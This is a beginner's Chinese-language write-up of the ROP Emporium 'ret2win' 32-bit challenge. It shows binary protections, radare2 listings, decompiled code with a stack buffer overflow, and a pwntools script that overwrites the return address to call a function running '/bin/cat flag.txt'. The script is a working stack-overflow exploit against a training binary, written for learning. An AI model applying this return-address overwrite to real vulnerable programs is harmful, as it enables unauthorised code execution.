一个pwn新手的笔记

1.检查

1.1保护和字符串

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

[0x08048480]> iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000710 0x08048710 23  24   .rodata ascii ret2win by ROP Emporium
1   0x00000728 0x08048728 7   8    .rodata ascii 32bits\n
2   0x00000730 0x08048730 8   9    .rodata ascii \nExiting
3   0x0000073c 0x0804873c 125 126  .rodata ascii For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\nWhat could possibly go wrong?
4   0x000007bc 0x080487bc 100 101  .rodata ascii You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n
5   0x00000824 0x08048824 28  29   .rodata ascii Thank you! Here's your flag:
6   0x00000841 0x08048841 17  18   .rodata ascii /bin/cat flag.txt

• 发现0x08048841有引用字符串/bin/cat flag.txt

1.2查看引用

[0x08048480]> ax. 0x08048841
sym.ret2win 0x8048672 [DATA] push str.bin_cat_flag.txt
[0x08048480]> pd @0x8048672
│           0x08048672      6841880408     push str.bin_cat_flag.txt   ; 0x8048841 ; "/bin/cat flag.txt" ; const char *string
│           0x08048677      e8b4fdffff     call sym.imp.system         ; int system(const char *string)
│           0x0804867c      83c410         add esp, 0x10
│           0x0804867f      90             nop
│           0x08048680      c9             leave
└           0x08048681      c3             ret
            0x08048682      6690           nop
            ............
            ; DATA XREF from entry0 @ 0x8048490

• 确认cat flag地址:0x08048672

2.1函数分析

• main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("ret2win by ROP Emporium");
  puts("32bits\n");
  pwnme();
  puts("\nExiting");
  return 0;
}

• pwnme

char *pwnme()
{
  char s; // [esp+0h] [ebp-28h]

  memset(&s, 0, 0x20u);
  puts(
    "For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\n"
    "What could possibly go wrong?");
  puts("You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n");
  printf("> ");
  return fgets(&s, 0x32, stdin);
}

3.1 EXP

from pwn import *
#context.log_level = "debug"
p = process("./ret2win32")

cat_flag = 0x08048672

payload = '\x00'*(0x28+4) + p32(cat_flag)
p.sendlineafter("> ",payload)
print(p.recv())

3.2效果:

[+] Starting local process './ret2win32': pid 378
ROPE{a_placeholder_32byte_flag!}

[*] Stopped process './ret2win32' (pid 378)

4

开始熟悉32位程序的结构